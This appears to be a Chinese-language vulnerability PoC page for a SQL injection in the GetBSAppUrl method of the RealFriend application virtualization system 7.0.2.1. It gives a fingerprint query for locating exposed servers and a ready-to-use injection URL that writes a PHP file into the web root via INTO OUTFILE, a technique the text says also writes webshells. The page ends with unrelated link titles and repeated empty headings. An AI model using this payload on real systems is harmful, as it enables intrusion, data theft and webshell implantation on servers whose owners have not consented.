# 瑞友应用虚拟化系统 GetBSAppUrl SQL注入漏洞

# 漏洞描述

瑞友应用虚拟化系统 GetBSAppUrl方法存在SQL注入漏洞，由于参数传入没有进行过滤导致存在SQL注入，攻击者通过漏洞可以获取数据库敏感信息

# 漏洞影响

瑞友应用虚拟化系统 7.0.2.1

# 网络测绘

"CASMain.XGI?cmd=GetDirApp" && title=="瑞友应用虚拟化系统"

# 漏洞复现

登陆页面

在 GetBSAppUrl 方法中存在SQL注入漏洞，通过漏洞可以写入Webshell文件

验证POC

/index.php?s=/Agent/GetBSAppUrl/AppID/')%3bselect+0x3c3f70687020706870696e666f28293b3f3e+into+outfile+%27C%3a\\Program+Files+(x86)\\RealFriend\\Rap+Server\\WebRoot\\test7.php%27%23/123

/test7.php

三汇SMG 网关管理软件 down.php 任意文件读取漏洞用友畅捷通T+ DownloadProxy.aspx 任意文件读取漏洞

# 瑞友 应用虚拟化系统 GetBSAppUrl SQL注入漏洞

# 漏洞描述

# 漏洞影响

# 网络测绘

# 漏洞复现

# 瑞友应用虚拟化系统 GetBSAppUrl SQL注入漏洞